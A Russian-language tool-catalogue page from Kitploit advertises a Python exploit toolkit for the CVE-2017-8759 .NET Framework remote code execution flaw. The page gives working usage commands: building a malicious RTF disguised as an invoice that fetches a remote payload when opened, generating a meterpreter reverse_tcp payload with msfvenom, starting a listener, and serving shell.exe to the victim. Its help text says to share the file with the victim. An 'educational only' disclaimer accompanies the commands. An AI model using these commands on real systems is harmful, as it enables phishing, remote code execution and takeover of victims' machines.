Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2017-8759 — Exploit toolkit CVE-2017-8759 - v1.0是一个方便的Python脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方法来测试Microsoft .NET Framework RCE。它可以生成恶意RTF文件,并在无需复杂配置的情况下向受害者传递metasploit / meterpreter / 其他载荷。 | Kitploit
Инструменты/GitHubGitHub/bhdresh/cve-2017-8759
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubbhdresh/cve-2017-8759

CVE-2017-8759

Exploit toolkit CVE-2017-8759 - v1.0是一个方便的Python脚本,为渗透测试人员和安全研究人员提供了一种快速有效的方法来测试Microsoft .NET Framework RCE。它可以生成恶意RTF文件,并在无需复杂配置的情况下向受害者传递metasploit / meterpreter / 其他载荷。

Репозиторий
312109468 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Exploit toolkit CVE-2017-8759 - v1.0

Exploit toolkit CVE-2017-8759 - v1.0 — это удобный скрипт на Python, который предоставляет пентестерам и специалистам по безопасности быстрый и эффективный способ тестирования RCE Microsoft .NET Framework. Он может генерировать вредоносный RTF-файл и доставлять метасплойт / meterpreter / другие полезные нагрузки жертве без какой-либо сложной настройки.

Отказ от ответственности

Эта программа предназначена ТОЛЬКО для образовательных целей. Не используйте ее без разрешения. Стандартное предупреждение об отсутствии ответственности применяется, особенно тот факт, что я (bhdresh) не несу ответственности за любые убытки, причиненные прямым или косвенным использованием информации или функциональности, предоставленной этими программами. Автор или любой интернет-провайдер НЕ несут ответственности за контент или неправильное использование этих программ или любых их производных. Используя эту программу, вы принимаете тот факт, что любой ущерб (потеря данных, сбой системы, компрометация системы и т.д.), вызванный использованием этих программ, не является ответственностью bhdresh.

Наконец, это личная разработка, пожалуйста, уважайте ее философию и не используйте ее для плохих целей!

Лицензия

CC BY 4.0 licence - https://creativecommons.org/licenses/by/4.0/

Примечания к выпуску:

Добавлены следующие возможности в скрипт

root@kitploit:~
- Генерация вредоносного RTF-файла
- Режим эксплуатации для сгенерированного RTF-файла

Версия: Python 2.7.13

Сценарий: Доставка локальной полезной нагрузки meterpreter

Видеоурок: https://www.youtube.com/watch?v=46jEa1bmORM
Примеры команд
root@kitploit:~
1) Сгенерировать вредоносный RTF-файл
   # python cve-2017-8759_toolkit.py -M gen -w Invoice.rtf -u http://192.168.56.1/logo.txt
2) (Опционально, если используется MSF Payload): Сгенерировать полезную нагрузку metasploit и запустить обработчик
   # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4444 -f exe > /tmp/shell.exe
   # msfconsole -x "use multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.56.1; run"
3) Запустить набор инструментов в режиме эксплуатации для доставки локальной полезной нагрузки
   # python cve-2017-8759_toolkit.py -M exp -e http://192.168.56.1/shell.exe -l /tmp/shell.exe

Аргументы командной строки:

root@kitploit:~
# python cve-2017-8759_toolkit.py -h

Это удобный набор инструментов для эксплуатации CVE-2017-8759 (RCE Microsoft .NET Framework)

Режимы:

-M gen                                          Только генерация вредоносного файла

     Сгенерировать вредоносный RTF-файл:

      -w <Filename.rtf>                   Имя вредоносного RTF-файла (Поделитесь этим файлом с жертвой).

      -u <http://attacker.com/test.txt>   Путь к удаленному txt-файлу. Обычно это должен быть домен или IP-адрес, где запущен этот инструмент.
                                          Например, http://attackerip.com/test.txt (Этот URL будет включен в вредоносный RTF-файл и будет запрошен, как только жертва откроет вредоносный RTF-файл).

				      
-M exp                                          Запустить режим эксплуатации

     Эксплуатация:
  
      -p <TCP порт: по умолчанию 80>            Номер локального порта.

      -e <http://attacker.com/shell.exe>  Путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке, которую необходимо выполнить на цели.

      -l </tmp/shell.exe>                 Укажите локальный путь к исполняемому файлу / оболочке meterpreter / полезной нагрузке.

Автор

@bhdresh

Благодарности

@Voulnet, @vysec, @bhdresh

Ошибки, проблемы, запросы функций

Очевидно, я не разработчик на полную ставку, так что ожидайте некоторых неполадок

Пожалуйста, сообщайте об ошибках и проблемах через https://github.com/bhdresh/CVE-2017-8759/issues/new

Скачать инструмент